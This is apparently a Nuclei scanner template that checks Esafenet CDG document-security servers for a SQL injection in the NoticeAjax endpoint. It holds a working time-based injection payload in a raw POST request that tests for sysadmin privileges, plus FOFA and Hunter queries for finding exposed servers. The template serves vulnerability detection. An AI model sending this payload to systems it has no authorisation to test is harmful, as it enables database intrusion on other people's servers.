nuclei-templates/http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml

36 lines
1.3 KiB
YAML

id: esafenet-noticeajax-sqli
info:
name: Esafenet CDG NoticeAjax - Sql Injection
author: adeljck
severity: high
description: |
CDGServer3 NoticeAjax Interface Sql Injection.
metadata:
verified: true
max-request: 1
fofa-query: title="电子文档安全管理系统",body="CDGServer3/"
hunter-query: web.title="电子文档安全管理系统",web.body="CDGServer3/"
product: electronic_document_security_management_system
vendor: esafenet
tags: esafenet,sqli
http:
- raw:
- |
@timeout: 10s
POST /CDGServer3/NoticeAjax;Service HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
command=delNotice&noticeId=123';if+(select+IS_SRVROLEMEMBER('sysadmin'))=1+WAITFOR+DELAY+'0:0:5'--
matchers:
- type: dsl
dsl:
- 'contains(content_type,"text/xml")'
- 'contains(body,"OK")'
- 'status_code == 200'
condition: and
# digest: 490a00463044022009c985318bd9f91927035c5788f4c5f73f14ae4f1ac1dd60090bdf0b22cf88ff02204e704959ef142792827df00a87364d1d86f7245d5561f6556b17042309d0de2a:922c64590222798bb761d5b6d8e72950